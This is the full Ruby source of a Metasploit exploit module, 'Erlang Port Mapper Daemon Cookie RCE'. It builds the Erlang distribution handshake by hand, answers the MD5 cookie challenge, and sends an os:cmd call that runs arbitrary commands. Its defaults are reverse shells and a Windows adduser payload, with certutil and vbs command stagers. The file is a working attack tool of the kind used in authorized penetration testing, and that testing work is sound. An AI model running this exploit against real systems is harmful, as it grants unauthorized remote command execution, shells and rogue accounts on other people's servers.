Path: blob/master/modules/exploits/multi/misc/erlang_cookie_rce.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::CmdStager1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Erlang Port Mapper Daemon Cookie RCE',16'Description' => %q{17The erlang port mapper daemon is used to coordinate distributed erlang instances.18Should an attacker get the authentication cookie RCE is trivial. Usually, this19cookie is named ".erlang.cookie" and varies on location.20},21'Author' => [22'Daniel Mende', # blog post article23'Milton Valencia (wetw0rk)', # metasploit module24],25'References' => [26['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']27],28'License' => MSF_LICENSE,29'Privileged' => 'false',30'Targets' => [31[32'Unix',33'Platform' => 'unix',34'Arch' => ARCH_CMD,35'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },36],37[38'Linux (CmdStager)',39'Type' => :cmdstager,40'Platform' => 'linux',41'Arch' => [ARCH_X64, ARCH_X86],42'CmdStagerFlavor' => ['printf', 'echo', 'bourne']43],44[45'Windows',46'Platform' => 'win',47'Arch' => ARCH_CMD,48'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/adduser' },49],50[51'Windows (CmdStager)',52'Type' => :cmdstager,53'Platform' => 'win',54'Arch' => [ARCH_X64, ARCH_X86],55'CmdStagerFlavor' => ['certutil', 'vbs'],56'DefaultOptions' => { 'PAYLOAD' => 'windows/shell/reverse_tcp' }57]58],59'DefaultTarget' => 0,60'DisclosureDate' => '2009-11-20',61'Notes' => {62'Reliability' => UNKNOWN_RELIABILITY,63'Stability' => UNKNOWN_STABILITY,64'SideEffects' => UNKNOWN_SIDE_EFFECTS65} # https://github.com/erlang/otp/blob/master/lib/kernel/src/os.erl (history)66)67)6869register_options(70[71OptString.new('COOKIE', [ true, 'Erlang cookie to login with']),72Opt::RPORT(25672)73]74)75end7677def generate_challenge_digest(challenge)78challenge = challenge.unpack('H*')[0].to_i(16).to_s7980hash = Digest::MD5.new81hash.update(datastore['COOKIE'])82hash.update(challenge)8384vprint_status("MD5 digest generated: #{hash.hexdigest}")85return [hash.hexdigest].pack('H*')86end8788def execute_command(cmd, opts = {})89# SEND: send the message to the node90send = "\x00\x00\x00" # Length:0x0000000091send << [(0x50 + cmd.length + @our_node.length * 2).to_s(16)].pack('H*')92send << "\x70" #93send << "\x83" # VERSION_MAGIC94send << "\x68" # SMALL_TUPLE_EXT (104)95send << "\x04" # Arity: 496send << "\x61" # SMALL_INTEGER_EXT97send << "\x06" # Int: 698send << "\x67" # PID_EXT (103)99send << "\x64\x00" # Node:100send << [(@our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)101send << "#{@our_node}" # Node102send << "\x00\x00\x00\x03" # ID103send << "\x00\x00\x00\x00" # Serial104send << "\x00" # Creation105send << "\x64" # InternalSegmentIndex106send << "\x00\x00" # Len: 0x0000107send << "\x64" # InternalSegmentIndex108send << "\x00\x03" # Length: 3109send << "rex" # AtomText: rex110send << "\x83\x68\x02\x67\x64\x00" #111send << [(@our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)112send << "#{@our_node}" # Node113send << "\x00\x00\x00\x03" # ID114send << "\x00\x00\x00\x00" # Serial115send << "\x00" # Creation116send << "\x68" # SMALL_TUPLE_EXT (104)117send << "\x05" # Arity: 5118send << "\x64" # InternalSegmentIndex119send << "\x00\x04" # Length: 4120send << "call" # AtomText: call121send << "\x64" # InternalSegmentIndex122send << "\x00\x02" # Length: 2123send << "os" # AtomText: os124send << "\x64" # InternalSegmentIndex125send << "\x00\x03" # Length: 3126send << "cmd" # AtomText: cmd127send << "\x6c" # LIST_EXT128send << "\x00\x00\x00\x01" # Length: 1129send << "\x6b" # Elements: k130send << "\x00" # Tail131send << [(cmd.length).to_s(16)].pack('H*') # strlen(Command)132send << cmd133send << "\x6a" # NIL_EXT134send << "\x64" # InternalSegmentIndex135send << "\x00\x04" # Length: 4136send << "user" # AtomText: user137sock.put(send)138end139140def exploit141connect142143@our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"144145# SEND_NAME: send initial identification of who "we" are146send_name = "\x00" # Length: 0x0000147send_name << [(@our_node.length + 7).to_s(16)].pack('H*')148send_name << "\x6e" # Tag: n149send_name << "\x00\x05" # Version: R6 (5)150send_name << "\x00\x07\x49\x9c" # Flags (0x0007499c)151# DFLAG_EXTENDED_REFERENCES (0x4)152# DFLAG_DIST_MONITOR (0x8)153# DFLAG_FUN_TAGS (0x10)154# DFLAG_NEW_FUN_TAGS (0x80)155# DFLAG_EXTENDED_PIDS_PORTS (0x100)156# DFLAG_NEW_FLOATS (0x800)157# DFLAG_SMALL_ATOM_TAGS (0x4000)158# DFLAG_UTF8_ATOMS (0x10000)159# DFLAG_MAP_TAG (0x20000)160# DFLAG_BIG_CREATION (0x40000)161send_name << "#{@our_node}" # <generated>@<generated>162163# SEND_CHALLENGE_REPLY: return generated digest and its own challenge164send_challenge_reply = "\x00\x15" # Length: 21165send_challenge_reply << "\x72" # Tag: r166167sock.put(send_name)168169# receive servers "SEND_CHALLENGE" token (4 bytes)170print_status("Receiving server challenge")171challenge = sock.get172challenge = challenge[14, 4]173174send_challenge_reply << challenge175send_challenge_reply << generate_challenge_digest(challenge)176177print_status("Sending challenge reply")178sock.put(send_challenge_reply)179180if sock.get.length < 1181fail_with(Failure::UnexpectedReply, "Authentication Failed:#{datastore['COOKIE']}")182end183184print_good("Authentication successful, sending payload")185186print_status('Exploiting...')187if target['Type'] == :cmdstager188execute_cmdstager(:linemax => 100)189else190execute_command(payload.raw)191end192disconnect193end194end195196197